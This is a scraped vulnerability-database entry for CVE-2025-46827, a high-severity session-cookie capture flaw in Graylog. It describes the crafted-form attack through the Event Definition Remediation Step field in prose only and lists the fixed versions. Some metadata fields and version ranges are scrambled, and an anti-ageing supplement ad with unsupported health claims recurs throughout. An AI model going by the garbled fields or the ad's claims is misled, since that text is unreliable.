Session Cookie Vulnerability in Graylog Log Management Platform
CVE-2025-46827

8HIGH

Key Information:

Vendor: Graylog2
Status: Graylog2-server
Vendor: CVE Published:; 7 May 2025

What is CVE-2025-46827?

Graylog, an open-source log management solution, is susceptible to a vulnerability that allows an attacker to capture user session cookies. This occurs when an attacker exploits the Event Definition Remediation Step field by submitting a crafted HTML form. Successful exploitation requires the attacker to possess a user account configured with the ability to create event definitions, while the victim must have permissions to view alerts. Additionally, there must be an active Input on the Graylog server capable of handling form data, such as HTTP input or TCP raw. Users are urged to upgrade to versions 6.0.14, 6.1.10, or 6.2.0 to mitigate this risk, as no immediate workarounds are available if the specific criteria are met.

Human OS v1.0:
Ageing Is an Unpatched Zero-Day Vulnerability.

Remediate biological technical debt. Prime Ageing uses 95% high-purity SIRT6 activation to maintain genomic integrity and bolster systemic resilience.

Deploy the Patch

Affected Version(s)

graylog2-server < 6.0.14 < 6.0.14

graylog2-server >= 6.1.0, < 6.1.10 < 6.1.0, 6.1.10

References

https://github.com/Graylog2/graylog2-server/security/advi...

x_refsource_CONFIRM

CVSS V3.1

Score:

Severity:

HIGH

Confidentiality:

High

Integrity:

High

Availability:

High

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

Low

User Interaction:

Required

Scope:

Unchanged

Timeline

Vulnerability published
May 7, 2025
Vulnerability Reserved
Apr 30, 2025

JSON

Graylog2

What is CVE-2025-46827?

Human OS v1.0: Ageing Is an Unpatched Zero-Day Vulnerability.

Affected Version(s)

References

CVSS V3.1

Timeline

Human OS v1.0:
Ageing Is an Unpatched Zero-Day Vulnerability.